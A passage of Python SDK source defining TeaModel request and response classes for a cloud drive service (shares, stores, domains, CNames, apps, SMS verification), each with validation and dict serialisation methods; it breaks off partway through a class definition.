class UpdateShareResponse(TeaModel):
    """
    Update share response.
    """
    # Scalar wire fields emitted before share_policy, in serialization order.
    _HEAD_KEYS = (
        'created_at', 'creator', 'description', 'domain_id', 'drive_id',
        'expiration', 'expired', 'owner', 'permissions', 'share_file_id',
        'share_file_path', 'share_id', 'share_name',
    )
    # Scalar wire fields emitted after share_policy.
    _TAIL_KEYS = ('status', 'updated_at')

    def __init__(
        self,
        created_at: str = None,
        creator: str = None,
        description: str = None,
        domain_id: str = None,
        drive_id: str = None,
        expiration: str = None,
        expired: bool = None,
        owner: str = None,
        permissions: List[str] = None,
        share_file_id: str = None,
        share_file_path: str = None,
        share_id: str = None,
        share_name: str = None,
        share_policy: List[SharePermissionPolicy] = None,
        status: str = None,
        updated_at: str = None,
    ):
        # created_at
        self.created_at = created_at
        # creator
        self.creator = creator
        # description
        self.description = description
        # domain_id
        self.domain_id = domain_id
        # drive_id
        self.drive_id = drive_id
        # expiration
        self.expiration = expiration
        # expired
        self.expired = expired
        # owner
        self.owner = owner
        # permissions
        self.permissions = permissions
        # share_file_id
        self.share_file_id = share_file_id
        # share file path
        self.share_file_path = share_file_path
        # share_id
        self.share_id = share_id
        # share_name
        self.share_name = share_name
        self.share_policy = share_policy
        # status
        self.status = status
        # updated_at
        self.updated_at = updated_at

    def validate(self):
        # Only the nested share policies carry their own validation.
        for policy in self.share_policy or []:
            if policy:
                policy.validate()

    def to_map(self):
        """Serialize non-None fields; 'share_policy' is always emitted."""
        result = dict()
        for key in self._HEAD_KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        result['share_policy'] = []
        if self.share_policy is not None:
            for policy in self.share_policy:
                result['share_policy'].append(policy.to_map() if policy else None)
        for key in self._TAIL_KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from dict *m*; share_policy is always reset."""
        m = m or dict()
        for key in self._HEAD_KEYS:
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        self.share_policy = []
        if m.get('share_policy') is not None:
            for raw in m.get('share_policy'):
                self.share_policy.append(SharePermissionPolicy().from_map(raw))
        for key in self._TAIL_KEYS:
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class UserAuthentication(TeaModel):
    """
    User authentication record.
    """
    # (attribute, wire key) pairs in serialization order; wire keys are
    # PascalCase except for 'extra', which is also the only optional field
    # (it must stay last — validate() relies on that).
    _FIELDS = (
        ('authentication_type', 'AuthenticationType'),
        ('created_at', 'CreatedAt'),
        ('detail', 'Detail'),
        ('domain_id', 'DomainID'),
        ('identity', 'Identity'),
        ('last_login_time', 'LastLoginTime'),
        ('status', 'Status'),
        ('user_id', 'UserID'),
        ('extra', 'extra'),
    )

    def __init__(
        self,
        authentication_type: str = None,
        created_at: int = None,
        detail: str = None,
        domain_id: str = None,
        identity: str = None,
        last_login_time: int = None,
        status: str = None,
        user_id: str = None,
        extra: str = None,
    ):
        # Authentication type
        self.authentication_type = authentication_type
        # Creation time
        self.created_at = created_at
        # Details
        self.detail = detail
        # Domain ID
        self.domain_id = domain_id
        # Unique identity
        self.identity = identity
        # Last login time
        self.last_login_time = last_login_time
        # Status
        self.status = status
        # User ID
        self.user_id = user_id
        # Extra info, e.g. the country code when the type is mobile (default 86)
        self.extra = extra

    def validate(self):
        # Every field except the trailing 'extra' is required.
        for attr, _key in self._FIELDS[:-1]:
            self.validate_required(getattr(self, attr), attr)

    def to_map(self):
        """Serialize non-None fields under their PascalCase wire names."""
        result = dict()
        for attr, key in self._FIELDS:
            value = getattr(self, attr)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from dict *m* keyed by the PascalCase wire names."""
        m = m or dict()
        for attr, key in self._FIELDS:
            value = m.get(key)
            if value is not None:
                setattr(self, attr, value)
        return self
class VerifyCodeRequest(TeaModel):
    """
    Verify SMS code request.
    """
    # Wire names match attribute names one-for-one, in serialization order.
    _KEYS = (
        'headers', 'app_id', 'phone_number', 'phone_region',
        'sms_code', 'sms_code_id', 'verify_type',
    )
    # Fields checked by validate().
    _REQUIRED = ('app_id', 'phone_number', 'sms_code', 'sms_code_id')

    def __init__(
        self,
        headers: Dict[str, str] = None,
        app_id: str = None,
        phone_number: str = None,
        phone_region: str = None,
        sms_code: str = None,
        sms_code_id: str = None,
        verify_type: str = None,
    ):
        self.headers = headers
        # App ID of the app being accessed
        self.app_id = app_id
        # Phone number
        self.phone_number = phone_number
        # Country code, default 86; digits only, no leading '+'
        self.phone_region = phone_region
        # SMS verification code content
        self.sms_code = sms_code
        # SMS verification code ID
        self.sms_code_id = sms_code_id
        # Type of the content being verified
        self.verify_type = verify_type

    def validate(self):
        for attr in self._REQUIRED:
            self.validate_required(getattr(self, attr), attr)

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from dict *m*, ignoring absent/None entries."""
        m = m or dict()
        for key in self._KEYS:
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class Store(TeaModel):
    """
    Storage (store) description.
    """
    # Wire names match attribute names one-for-one, in serialization order.
    _KEYS = (
        'accelerate_endpoint', 'base_path', 'bucket', 'cdn_endpoint',
        'customized_accelerate_endpoint', 'customized_cdn_endpoint',
        'customized_endpoint', 'customized_internal_endpoint', 'endpoint',
        'internal_endpoint', 'location', 'ownership', 'policy', 'role_arn',
        'store_id', 'type',
    )
    # Fields checked by validate().
    _REQUIRED = ('bucket', 'endpoint', 'ownership', 'policy', 'store_id', 'type')

    def __init__(
        self,
        accelerate_endpoint: str = None,
        base_path: str = None,
        bucket: str = None,
        cdn_endpoint: str = None,
        customized_accelerate_endpoint: str = None,
        customized_cdn_endpoint: str = None,
        customized_endpoint: str = None,
        customized_internal_endpoint: str = None,
        endpoint: str = None,
        internal_endpoint: str = None,
        location: str = None,
        ownership: str = None,
        policy: str = None,
        role_arn: str = None,
        store_id: str = None,
        type: str = None,
    ):
        # Global acceleration endpoint
        self.accelerate_endpoint = accelerate_endpoint
        # Common storage path prefix
        self.base_path = base_path
        # Bucket name
        self.bucket = bucket
        # CDN endpoint
        self.cdn_endpoint = cdn_endpoint
        # Custom global acceleration endpoint
        self.customized_accelerate_endpoint = customized_accelerate_endpoint
        # Custom CDN endpoint
        self.customized_cdn_endpoint = customized_cdn_endpoint
        # Custom public endpoint
        self.customized_endpoint = customized_endpoint
        # Custom VPC endpoint
        self.customized_internal_endpoint = customized_internal_endpoint
        # Public endpoint
        self.endpoint = endpoint
        # VPC endpoint
        self.internal_endpoint = internal_endpoint
        # Location
        self.location = location
        # Store ownership: 'system' is platform-provided, 'custom' is user-owned
        self.ownership = ownership
        # Policy grant; a 'system' store grants bucket access to the current cloud account
        self.policy = policy
        # Role ARN used to access the bucket
        self.role_arn = role_arn
        # Store ID
        self.store_id = store_id
        # Storage type; currently only 'oss' is supported
        self.type = type

    def validate(self):
        for attr in self._REQUIRED:
            self.validate_required(getattr(self, attr), attr)

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from dict *m*, ignoring absent/None entries."""
        m = m or dict()
        for key in self._KEYS:
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class ListStoresResponse(TeaModel):
    """
    List stores response.
    """
    def __init__(
        self,
        items: List[Store] = None,
    ):
        # List of stores
        self.items = items

    def validate(self):
        self.validate_required(self.items, 'items')
        for item in self.items or []:
            if item:
                item.validate()

    def to_map(self):
        """Serialize to a dict; 'items' is always present as a list."""
        result = dict()
        result['items'] = []
        if self.items is not None:
            result['items'] = [item.to_map() if item else None for item in self.items]
        return result

    def from_map(self, m: dict = None):
        """Rebuild the items list from dict *m*; items is always reset."""
        m = m or dict()
        self.items = []
        if m.get('items') is not None:
            for raw in m.get('items'):
                self.items.append(Store().from_map(raw))
        return self
class AdminListStoresModel(TeaModel):
    """Response wrapper pairing HTTP headers with a ListStoresResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: ListStoresResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        """Serialize headers as-is and the body via its own to_map()."""
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        """Populate headers and deserialize the body into its model."""
        m = m or dict()
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = ListStoresResponse().from_map(m['body'])
        return self
class GetUserAccessTokenModel(TeaModel):
    """Response wrapper pairing HTTP headers with an AccessTokenResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: AccessTokenResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        """Serialize headers as-is and the body via its own to_map()."""
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        """Populate headers and deserialize the body into its model."""
        m = m or dict()
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = AccessTokenResponse().from_map(m['body'])
        return self
class AddStoreResponse(TeaModel):
    """
    Add store response.
    """
    # Wire names match attribute names one-for-one, in serialization order.
    _KEYS = (
        'accelerate_endpoint', 'base_path', 'bucket', 'cdn_endpoint',
        'customized_accelerate_endpoint', 'customized_cdn_endpoint',
        'customized_endpoint', 'customized_internal_endpoint', 'domain_id',
        'endpoint', 'internal_endpoint', 'location', 'ownership', 'policy',
        'role_arn', 'store_id', 'type',
    )
    # Fields checked by validate().
    _REQUIRED = (
        'bucket', 'domain_id', 'endpoint', 'ownership', 'policy',
        'store_id', 'type',
    )

    def __init__(
        self,
        accelerate_endpoint: str = None,
        base_path: str = None,
        bucket: str = None,
        cdn_endpoint: str = None,
        customized_accelerate_endpoint: str = None,
        customized_cdn_endpoint: str = None,
        customized_endpoint: str = None,
        customized_internal_endpoint: str = None,
        domain_id: str = None,
        endpoint: str = None,
        internal_endpoint: str = None,
        location: str = None,
        ownership: str = None,
        policy: str = None,
        role_arn: str = None,
        store_id: str = None,
        type: str = None,
    ):
        # Global acceleration endpoint
        self.accelerate_endpoint = accelerate_endpoint
        # Common storage path prefix
        self.base_path = base_path
        # Bucket name
        self.bucket = bucket
        # CDN endpoint
        self.cdn_endpoint = cdn_endpoint
        # Custom global acceleration endpoint
        self.customized_accelerate_endpoint = customized_accelerate_endpoint
        # Custom CDN endpoint
        self.customized_cdn_endpoint = customized_cdn_endpoint
        # Custom public endpoint
        self.customized_endpoint = customized_endpoint
        # Custom VPC endpoint
        self.customized_internal_endpoint = customized_internal_endpoint
        # Domain ID
        self.domain_id = domain_id
        # Public endpoint
        self.endpoint = endpoint
        # VPC endpoint
        self.internal_endpoint = internal_endpoint
        # Location
        self.location = location
        # Store ownership: 'system' is platform-provided, 'custom' is user-owned
        self.ownership = ownership
        # Policy grant; a 'system' store grants bucket access to the current cloud account
        self.policy = policy
        # Role ARN used to access the bucket
        self.role_arn = role_arn
        # Store ID
        self.store_id = store_id
        # Storage type; currently only 'oss' is supported
        self.type = type

    def validate(self):
        for attr in self._REQUIRED:
            self.validate_required(getattr(self, attr), attr)

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from dict *m*, ignoring absent/None entries."""
        m = m or dict()
        for key in self._KEYS:
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class AdminListStoresRequest(TeaModel):
    """Request model for the admin list-stores operation (headers only)."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
    ):
        # Optional HTTP headers to send with the request.
        self.headers = headers

    def validate(self):
        # This request has no required fields.
        pass

    def to_map(self):
        """Serialize to a dict, omitting unset fields."""
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        return result

    def from_map(self, m: dict = None):
        """Populate from *m*; a missing/None 'headers' key leaves the attribute untouched."""
        m = m or dict()
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        return self
class BaseDomainResponse(TeaModel):
    """
    base domain response
    """
    # Field names in wire/serialization order, shared by to_map and from_map.
    _FIELD_NAMES = (
        'api_cname', 'app_cname', 'auth_alipay_app_id', 'auth_alipay_enable',
        'auth_alipay_private_key', 'auth_cname', 'auth_config',
        'auth_dingding_app_id', 'auth_dingding_app_secret',
        'auth_dingding_enable', 'auth_endpoint_enable', 'auth_ram_app_id',
        'auth_ram_app_secret', 'auth_ram_enable', 'created_at',
        'data_hash_name', 'description', 'domain_id', 'domain_name',
        'event_filename_matches', 'event_mns_endpoint', 'event_mns_topic',
        'event_names', 'event_role_arn', 'init_drive_enable',
        'init_drive_size', 'init_drive_store_id', 'mode', 'path_type',
        'published_app_access_strategy', 'sharable', 'store_level',
        'store_region_list', 'updated_at',
    )

    def __init__(
        self,
        api_cname: str = None,
        app_cname: str = None,
        auth_alipay_app_id: str = None,
        auth_alipay_enable: bool = None,
        auth_alipay_private_key: str = None,
        auth_cname: str = None,
        auth_config: dict = None,
        auth_dingding_app_id: str = None,
        auth_dingding_app_secret: str = None,
        auth_dingding_enable: bool = None,
        auth_endpoint_enable: bool = None,
        auth_ram_app_id: str = None,
        auth_ram_app_secret: str = None,
        auth_ram_enable: bool = None,
        created_at: str = None,
        data_hash_name: str = None,
        description: str = None,
        domain_id: str = None,
        domain_name: str = None,
        event_filename_matches: str = None,
        event_mns_endpoint: str = None,
        event_mns_topic: str = None,
        event_names: List[str] = None,
        event_role_arn: str = None,
        init_drive_enable: bool = None,
        init_drive_size: int = None,
        init_drive_store_id: str = None,
        mode: str = None,
        path_type: str = None,
        published_app_access_strategy: AppAccessStrategy = None,
        sharable: bool = None,
        store_level: str = None,
        store_region_list: List[str] = None,
        updated_at: str = None,
    ):
        # Domain API CName.
        self.api_cname = api_cname
        # Domain App CName.
        self.app_cname = app_cname
        # Alipay app id.
        self.auth_alipay_app_id = auth_alipay_app_id
        # Whether Alipay authentication is enabled.
        self.auth_alipay_enable = auth_alipay_enable
        # Alipay app secret (private key).
        self.auth_alipay_private_key = auth_alipay_private_key
        # Domain Auth CName.
        self.auth_cname = auth_cname
        # Login-related configuration.
        self.auth_config = auth_config
        # DingTalk app id.
        self.auth_dingding_app_id = auth_dingding_app_id
        # DingTalk app secret.
        self.auth_dingding_app_secret = auth_dingding_app_secret
        # Whether DingTalk authentication is enabled.
        self.auth_dingding_enable = auth_dingding_enable
        self.auth_endpoint_enable = auth_endpoint_enable
        # RAM app id.
        self.auth_ram_app_id = auth_ram_app_id
        # RAM app secret.
        self.auth_ram_app_secret = auth_ram_app_secret
        # Whether RAM authentication is enabled.
        self.auth_ram_enable = auth_ram_enable
        # Domain creation time.
        self.created_at = created_at
        # Data hash algorithm name.
        self.data_hash_name = data_hash_name
        # Domain description.
        self.description = description
        # Domain ID.
        self.domain_id = domain_id
        # Domain name.
        self.domain_name = domain_name
        # Filename pattern for MNS event notification.
        self.event_filename_matches = event_filename_matches
        # MNS endpoint for event notification.
        self.event_mns_endpoint = event_mns_endpoint
        # MNS topic for event notification.
        self.event_mns_topic = event_mns_topic
        # List of event names.
        self.event_names = event_names
        # Role ARN used for event notification.
        self.event_role_arn = event_role_arn
        # Whether automatic drive initialization is enabled.
        self.init_drive_enable = init_drive_enable
        # Size of the auto-initialized drive.
        self.init_drive_size = init_drive_size
        # Store ID used by the auto-initialized drive.
        self.init_drive_store_id = init_drive_store_id
        # Domain mode.
        self.mode = mode
        # Domain path type.
        self.path_type = path_type
        self.published_app_access_strategy = published_app_access_strategy
        # Whether sharing is enabled.
        self.sharable = sharable
        # Storage level.
        self.store_level = store_level
        # List of storage regions.
        self.store_region_list = store_region_list
        # Domain update time.
        self.updated_at = updated_at

    def validate(self):
        # Only the nested access-strategy model carries its own validation.
        if self.published_app_access_strategy:
            self.published_app_access_strategy.validate()

    def to_map(self):
        """Serialize every non-None field into a dict, recursing into the nested model."""
        result = dict()
        for name in self._FIELD_NAMES:
            value = getattr(self, name)
            if value is None:
                continue
            if name == 'published_app_access_strategy':
                value = value.to_map()
            result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate this model from *m*; keys that are absent or None are skipped."""
        m = m or dict()
        for name in self._FIELD_NAMES:
            value = m.get(name)
            if value is None:
                continue
            if name == 'published_app_access_strategy':
                value = AppAccessStrategy().from_map(value)
            setattr(self, name, value)
        return self
class BaseMediaResponse(TeaModel):
    """
    Media metadata response: location/time attributes plus image tags.
    """
    # Scalar fields serialized before/after the 'image_tags' list, in wire order.
    _SCALARS_BEFORE_TAGS = ('address_line', 'city', 'country', 'district', 'height')
    _SCALARS_AFTER_TAGS = ('location', 'province', 'time', 'township', 'width')

    def __init__(
        self,
        address_line: str = None,
        city: str = None,
        country: str = None,
        district: str = None,
        height: int = None,
        image_tags: List[SystemTag] = None,
        location: str = None,
        province: str = None,
        time: str = None,
        township: str = None,
        width: int = None,
    ):
        # Address line.
        self.address_line = address_line
        # City.
        self.city = city
        # Country.
        self.country = country
        # District.
        self.district = district
        # Height (presumably pixels — original source does not say; confirm).
        self.height = height
        # System tags attached to the image.
        self.image_tags = image_tags
        # Location.
        self.location = location
        # Province.
        self.province = province
        # Time.
        self.time = time
        # Township.
        self.township = township
        # Width (presumably pixels — original source does not say; confirm).
        self.width = width

    def validate(self):
        # Scalars are all optional; each tag model validates itself.
        if self.image_tags:
            for tag in self.image_tags:
                if tag:
                    tag.validate()

    def to_map(self):
        """Serialize to a dict. The 'image_tags' key is always present, even when unset."""
        result = dict()
        for name in self._SCALARS_BEFORE_TAGS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        result['image_tags'] = []
        if self.image_tags is not None:
            for tag in self.image_tags:
                result['image_tags'].append(tag.to_map() if tag else None)
        for name in self._SCALARS_AFTER_TAGS:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate from *m*. 'image_tags' is always reset, then rebuilt when present."""
        m = m or dict()
        for name in self._SCALARS_BEFORE_TAGS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        self.image_tags = []
        if m.get('image_tags') is not None:
            for item in m.get('image_tags'):
                self.image_tags.append(SystemTag().from_map(item))
        for name in self._SCALARS_AFTER_TAGS:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class CNameStatus(TeaModel):
    """
    Binding and legal status of a CName.
    """
    # NOTE: 'bingding_state' misspelling is the actual wire key — do not "fix" it.
    _FIELD_NAMES = ('bingding_state', 'legal_state', 'remark')

    def __init__(
        self,
        bingding_state: str = None,
        legal_state: str = None,
        remark: str = None,
    ):
        # Binding state of the CName.
        self.bingding_state = bingding_state
        # Legal state of the CName.
        self.legal_state = legal_state
        # Free-form remark.
        self.remark = remark

    def validate(self):
        # All three fields are mandatory.
        for name in self._FIELD_NAMES:
            self.validate_required(getattr(self, name), name)

    def to_map(self):
        """Serialize non-None fields into a dict."""
        result = dict()
        for name in self._FIELD_NAMES:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate from *m*; absent or None keys are skipped."""
        m = m or dict()
        for name in self._FIELD_NAMES:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class CreateDomainResponse(TeaModel):
    """
    create domain response
    """
    # Field names in wire/serialization order, shared by to_map and from_map.
    _FIELD_NAMES = (
        'api_cname', 'app_cname', 'auth_alipay_app_id', 'auth_alipay_enable',
        'auth_alipay_private_key', 'auth_cname', 'auth_config',
        'auth_dingding_app_id', 'auth_dingding_app_secret',
        'auth_dingding_enable', 'auth_endpoint_enable', 'auth_ram_app_id',
        'auth_ram_app_secret', 'auth_ram_enable', 'created_at',
        'data_hash_name', 'description', 'domain_id', 'domain_name',
        'event_filename_matches', 'event_mns_endpoint', 'event_mns_topic',
        'event_names', 'event_role_arn', 'init_drive_enable',
        'init_drive_size', 'init_drive_store_id', 'mode', 'path_type',
        'published_app_access_strategy', 'sharable', 'store_level',
        'store_region_list', 'updated_at',
    )

    def __init__(
        self,
        api_cname: str = None,
        app_cname: str = None,
        auth_alipay_app_id: str = None,
        auth_alipay_enable: bool = None,
        auth_alipay_private_key: str = None,
        auth_cname: str = None,
        auth_config: dict = None,
        auth_dingding_app_id: str = None,
        auth_dingding_app_secret: str = None,
        auth_dingding_enable: bool = None,
        auth_endpoint_enable: bool = None,
        auth_ram_app_id: str = None,
        auth_ram_app_secret: str = None,
        auth_ram_enable: bool = None,
        created_at: str = None,
        data_hash_name: str = None,
        description: str = None,
        domain_id: str = None,
        domain_name: str = None,
        event_filename_matches: str = None,
        event_mns_endpoint: str = None,
        event_mns_topic: str = None,
        event_names: List[str] = None,
        event_role_arn: str = None,
        init_drive_enable: bool = None,
        init_drive_size: int = None,
        init_drive_store_id: str = None,
        mode: str = None,
        path_type: str = None,
        published_app_access_strategy: AppAccessStrategy = None,
        sharable: bool = None,
        store_level: str = None,
        store_region_list: List[str] = None,
        updated_at: str = None,
    ):
        # Domain API CName.
        self.api_cname = api_cname
        # Domain App CName.
        self.app_cname = app_cname
        # Alipay app id.
        self.auth_alipay_app_id = auth_alipay_app_id
        # Whether Alipay authentication is enabled.
        self.auth_alipay_enable = auth_alipay_enable
        # Alipay app secret (private key).
        self.auth_alipay_private_key = auth_alipay_private_key
        # Domain Auth CName.
        self.auth_cname = auth_cname
        # Login-related configuration.
        self.auth_config = auth_config
        # DingTalk app id.
        self.auth_dingding_app_id = auth_dingding_app_id
        # DingTalk app secret.
        self.auth_dingding_app_secret = auth_dingding_app_secret
        # Whether DingTalk authentication is enabled.
        self.auth_dingding_enable = auth_dingding_enable
        self.auth_endpoint_enable = auth_endpoint_enable
        # RAM app id.
        self.auth_ram_app_id = auth_ram_app_id
        # RAM app secret.
        self.auth_ram_app_secret = auth_ram_app_secret
        # Whether RAM authentication is enabled.
        self.auth_ram_enable = auth_ram_enable
        # Domain creation time.
        self.created_at = created_at
        # Data hash algorithm name.
        self.data_hash_name = data_hash_name
        # Domain description.
        self.description = description
        # Domain ID.
        self.domain_id = domain_id
        # Domain name.
        self.domain_name = domain_name
        # Filename pattern for MNS event notification.
        self.event_filename_matches = event_filename_matches
        # MNS endpoint for event notification.
        self.event_mns_endpoint = event_mns_endpoint
        # MNS topic for event notification.
        self.event_mns_topic = event_mns_topic
        # List of event names.
        self.event_names = event_names
        # Role ARN used for event notification.
        self.event_role_arn = event_role_arn
        # Whether automatic drive initialization is enabled.
        self.init_drive_enable = init_drive_enable
        # Size of the auto-initialized drive.
        self.init_drive_size = init_drive_size
        # Store ID used by the auto-initialized drive.
        self.init_drive_store_id = init_drive_store_id
        # Domain mode.
        self.mode = mode
        # Domain path type.
        self.path_type = path_type
        self.published_app_access_strategy = published_app_access_strategy
        # Whether sharing is enabled.
        self.sharable = sharable
        # Storage level.
        self.store_level = store_level
        # List of storage regions.
        self.store_region_list = store_region_list
        # Domain update time.
        self.updated_at = updated_at

    def validate(self):
        # Only the nested access-strategy model carries its own validation.
        if self.published_app_access_strategy:
            self.published_app_access_strategy.validate()

    def to_map(self):
        """Serialize every non-None field into a dict, recursing into the nested model."""
        result = dict()
        for name in self._FIELD_NAMES:
            value = getattr(self, name)
            if value is None:
                continue
            if name == 'published_app_access_strategy':
                value = value.to_map()
            result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate this model from *m*; keys that are absent or None are skipped."""
        m = m or dict()
        for name in self._FIELD_NAMES:
            value = m.get(name)
            if value is None:
                continue
            if name == 'published_app_access_strategy':
                value = AppAccessStrategy().from_map(value)
            setattr(self, name, value)
        return self
class DataCName(TeaModel):
    """
    A data CName together with the location it serves.
    """
    def __init__(
        self,
        data_cname: str = None,
        location: str = None,
    ):
        # The data CName.
        self.data_cname = data_cname
        # Data location.
        self.location = location

    def validate(self):
        # Both fields are mandatory.
        for value, name in ((self.data_cname, 'data_cname'), (self.location, 'location')):
            self.validate_required(value, name)

    def to_map(self):
        """Serialize non-None fields into a dict."""
        result = dict()
        for name in ('data_cname', 'location'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate from *m*; absent or None keys are skipped."""
        m = m or dict()
        for name in ('data_cname', 'location'):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class DomainCNameResponse(TeaModel):
    """
    Response carrying a domain's list of data CNames.
    """
    def __init__(
        self,
        data_cname_list: List[DataCName] = None,
        domain_id: str = None,
    ):
        # List of data CName entries.
        self.data_cname_list = data_cname_list
        # Domain ID.
        self.domain_id = domain_id

    def validate(self):
        """Require both fields and validate each CName entry."""
        self.validate_required(self.data_cname_list, 'data_cname_list')
        if self.data_cname_list:
            for entry in self.data_cname_list:
                if entry:
                    entry.validate()
        self.validate_required(self.domain_id, 'domain_id')

    def to_map(self):
        """Serialize to a dict. The list key is always emitted, even when unset."""
        result = dict()
        result['data_cname_list'] = []
        if self.data_cname_list is not None:
            for entry in self.data_cname_list:
                result['data_cname_list'].append(entry.to_map() if entry else None)
        if self.domain_id is not None:
            result['domain_id'] = self.domain_id
        return result

    def from_map(self, m: dict = None):
        """Populate from *m*. The list is always reset, then rebuilt when present."""
        m = m or dict()
        self.data_cname_list = []
        if m.get('data_cname_list') is not None:
            for item in m.get('data_cname_list'):
                self.data_cname_list.append(DataCName().from_map(item))
        if m.get('domain_id') is not None:
            self.domain_id = m.get('domain_id')
        return self
class GetAppPublicKeyResponse(TeaModel):
    """
    Response carrying an app's RSA public key.
    """
    def __init__(
        self,
        app_id: str = None,
        public_key: str = None,
    ):
        # App ID.
        self.app_id = app_id
        # Public key of the RSA key pair, PEM-encoded.
        self.public_key = public_key

    def validate(self):
        # Both fields are mandatory.
        for value, name in ((self.app_id, 'app_id'), (self.public_key, 'public_key')):
            self.validate_required(value, name)

    def to_map(self):
        """Serialize non-None fields into a dict."""
        result = dict()
        for name in ('app_id', 'public_key'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate from *m*; absent or None keys are skipped."""
        m = m or dict()
        for name in ('app_id', 'public_key'):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetAppResponse(TeaModel):
    """
    Response describing an application registered with the service.
    """
    # Field names in wire/serialization order, shared by to_map and from_map.
    _FIELD_NAMES = (
        'ali_owner_id', 'app_id', 'app_name', 'app_secret', 'created_at',
        'description', 'logo', 'provider', 'redirect_uri', 'scope',
        'screenshots', 'stage', 'type', 'updated_at',
    )

    def __init__(
        self,
        ali_owner_id: str = None,
        app_id: str = None,
        app_name: str = None,
        app_secret: str = None,
        created_at: str = None,
        description: str = None,
        logo: str = None,
        provider: str = None,
        redirect_uri: str = None,
        scope: List[str] = None,
        screenshots: List[str] = None,
        stage: str = None,
        type: str = None,
        updated_at: str = None,
    ):
        # App owner.
        self.ali_owner_id = ali_owner_id
        # App ID.
        self.app_id = app_id
        # App name.
        self.app_name = app_name
        # App secret.
        self.app_secret = app_secret
        # App creation time.
        self.created_at = created_at
        # App description.
        self.description = description
        # App logo.
        self.logo = logo
        # App provider.
        self.provider = provider
        # App callback (redirect) URI.
        self.redirect_uri = redirect_uri
        # App permission scope list.
        self.scope = scope
        # App screenshots.
        self.screenshots = screenshots
        # Current stage of the app.
        self.stage = stage
        # App type.
        self.type = type
        # App modification time.
        self.updated_at = updated_at

    def validate(self):
        """Require every field; enforce length/pattern constraints where defined."""
        self.validate_required(self.ali_owner_id, 'ali_owner_id')
        self.validate_required(self.app_id, 'app_id')
        self.validate_required(self.app_name, 'app_name')
        if self.app_name is not None:
            # App name: at most 128 alphanumeric characters.
            self.validate_max_length(self.app_name, 'app_name', 128)
            self.validate_pattern(self.app_name, 'app_name', '[0-9a-zA-Z]+')
        self.validate_required(self.app_secret, 'app_secret')
        self.validate_required(self.created_at, 'created_at')
        self.validate_required(self.description, 'description')
        if self.description is not None:
            # Description limited to 128 characters.
            self.validate_max_length(self.description, 'description', 128)
        for value, name in (
            (self.logo, 'logo'),
            (self.provider, 'provider'),
            (self.redirect_uri, 'redirect_uri'),
            (self.scope, 'scope'),
            (self.screenshots, 'screenshots'),
            (self.stage, 'stage'),
            (self.type, 'type'),
            (self.updated_at, 'updated_at'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        """Serialize non-None fields into a dict."""
        result = dict()
        for name in self._FIELD_NAMES:
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate from *m*; absent or None keys are skipped."""
        m = m or dict()
        for name in self._FIELD_NAMES:
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetBizCNameInfoResponse(TeaModel):
    """
    Response describing a business CName binding and its certificate.
    """
    # Field names in wire/serialization order.
    _FIELD_NAMES = (
        'biz_cname', 'cert_id', 'cert_name', 'cname_status', 'cname_type',
        'domain_id', 'is_vpc',
    )

    def __init__(
        self,
        biz_cname: str = None,
        cert_id: str = None,
        cert_name: str = None,
        cname_status: CNameStatus = None,
        cname_type: str = None,
        domain_id: str = None,
        is_vpc: bool = None,
    ):
        # Business CName.
        self.biz_cname = biz_cname
        # Certificate ID.
        self.cert_id = cert_id
        # Certificate name.
        self.cert_name = cert_name
